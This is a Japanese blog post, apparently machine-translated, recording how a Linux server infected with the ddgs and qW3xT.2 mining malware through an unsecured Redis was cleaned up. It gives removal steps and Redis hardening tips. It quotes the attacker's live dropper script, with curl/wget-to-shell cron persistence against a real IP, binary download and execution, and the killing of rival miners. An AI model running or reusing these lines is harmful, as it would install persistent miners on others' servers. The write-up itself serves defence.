Linux サーバーに埋め込まれた ddgs および qW3xT.2 マイニングウイルスの対処の実践記録

序文

仮想通貨の狂気的な投機により、マイニングウイルスは犯罪者が最も頻繁に使用する攻撃方法の 1 つになりました。ウイルス拡散者は、パソコンやサーバーを使用してマイニングを行う可能性があります。具体的な現象としては、コンピューターの CPU 使用率が高くなる、C ドライブの空き容量が急激に減少する、コンピューターの温度が上昇する、ファンの騒音が増加するなどの問題があります。

この記事では、Linuxに埋め込まれたDDGSとqW3xT.2マイニングウイルスの処理方法を主に紹介します。詳細な紹介を見てみましょう。

侵略後の現象:

2 つの異常なプロセス (qW3xT.2 と ddgs) が見つかりました。これらのプロセスは CPU を大量に消費し、強制終了された後しばらくして再び現れました。

これら 2 つの異常なプロセスを終了した後、しばらくすると次のプロセスが見られました。

まず、/etc/sysconfig/crotnab 内のスケジュールされたタスクでスケジュールされたスクリプトが見つからなかったため、crontab -e を入力してスケジュールされたタスクを見つけました。

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

<span style="font-size: 15px;">149.56.106.215 が米国内にあることを確認しました。i.sh スクリプトの内容は次のとおりです。</span>

エクスポート PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
エコー "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
 wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
 curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
フィ
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

治療方法：

1. crontab -eを削除する

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

2. ハッカーが/root/.ssh/authorized_keysに設定したパスワードなしのログインコンテンツをクリアする

3. Redisのパスワードを変更する

4. ルートとログインアカウントのパスワードを変更する

安全のヒント:

1. Redisサーバーに接続できるIPを制限するためのbindオプションを設定し、Redisのデフォルトポート6379を変更し、認証、つまりAUTHを設定し、パスワードを設定します。パスワードはRedis設定ファイルにプレーンテキストで保存されます。

2. 名前変更コマンドの設定項目「RENAME_CONFIG」を設定すると、不正アクセスがあった場合でも、攻撃者がconfigコマンドを使用するのが難しくなります。

3. ファイアウォールでRedisの外部ネットワークをブロックできる場合

侵入方法:

関連情報を収集した結果、ハッカーは Redis の脆弱性を利用して侵入したことが判明しました。パスワードが設定されていなかったか、パスワードが単純すぎたのです。具体的な方法については、

https://www.jb51.net/article/147375.htm

reids パスワードの変更方法は次のとおりです。

redis-cli -h 127.0.0.1 -p 6379
config get requirepass ##現在のパスワードを取得します。 config set requirepass "yourpassword" ##現在のパスワードを設定します。サービスが再起動されると、デフォルト、つまりパスワードなしに設定されます。

永続的にするには、redis 構成ファイル redis.conf を開き、requirepass 値を見つけて、次のようにパスワードを変更します。

requirepass yourpassword ##行の前にスペースを入れないでください

要約する

上記はこの記事の全内容です。この記事の内容が皆さんの勉強や仕事に一定の参考学習価値を持つことを願っています。ご質問があれば、メッセージを残してコミュニケーションしてください。123WORDPRESS.COM を応援していただきありがとうございます。

以下もご興味があるかもしれません:

バッチ処理でポート135、137、445などを閉じる実装コード（ランサムウェアウイルス）
VBS スクリプトウイルスのウイルス原理の分析
PHP ウェブウイルス除去クラス
VC によって実装されたウイルスキラーツールの完全な例
DOSコマンドを使用してUSBウイルスと戦い、USBデータを保護する
USB ディスクウイルスを駆除する自家製バッチコード
C ウイルスプログラムの原理分析 (ウイルスを防ぐための C 言語の小さなウイルスの例)
分析: 悪意のあるウイルスコードが挿入されたSQL文をクリアする
自動実行ウイルス除去ツール bat コード
VBS.Runauto スクリプトウイルス分析
ウイルスがよく使用するVBSコード
Notepad.exe ウイルスを検出して駆除する方法
美容ゲームウイルス iwbkvd.exe を検出して駆除する方法
バッチ自動実行ウイルス除去ツール
ルートキットウイルスソリューション

<<: MySQL の大きなデータテーブルにフィールドを追加する方法

>>: SQL GROUP BYの詳細な説明と簡単な例

Linux サーバーに埋め込まれた ddgs および qW3xT.2 マイニングウイルスの対処の実践記録

Dockerが正常に起動しない原因と解決策を詳しく解説

mysql 10進データ型変換の実装

JavaScriptはスタック構造の詳細なプロセスを実装する

MySQLの7種類のログの概要

Nodejs でモジュール fs ファイルシステムを使用する方法

nginx パニック問題の解決方法の詳細な説明

MySQL での実行計画の詳細分析

CSSで半透明の背景色を実現する2つの方法について簡単に説明します。

MongoDB の起動エラーを解決します: 共有ライブラリのロード中にエラーが発生しました: libstdc++.so.6: 共有オブジェクトファイルを開けません:

MySQL の中国語ソートの詳細と例

推薦する

echarts ワードクラウドチャートを使用した Vue の実践記録

MySql 5.7.17 winx64 のインストールと設定に関する詳細なチュートリアル

モバイルデバイスでインラインスクロールを実装するための4つのソリューションの詳細な説明

FileZilla を使用して FTP ファイルサービスを素早く構築する方法

javascript:void(0) の意味と使用例

Linux のごみ箱メカニズムの実装プロセスと使用方法の詳細な説明

子ども向けウェブサイトの視覚構造レイアウト設計手法の分析

シンプルなCSSアニメーションのtransition属性の詳しい説明

Web デザインでフラッシュオーバーレイポップアップレイヤーの z-index プロパティを設定しても機能しない

MySQL 8.0 のインストール中に発生した 3 つの小さなエラーの概要

MySQL 空間データストレージと関数

mysqlはストアドプロシージャを使用してツリーノード取得メソッドを実装します。

MySQLのテーブル構造を変更する際に知っておきたいメタデータロックの詳しい解説

HTML でのアンカーポイントの使用_PowerNode Java アカデミー

WeChatアプレットリクエストの前処理方法の詳細な説明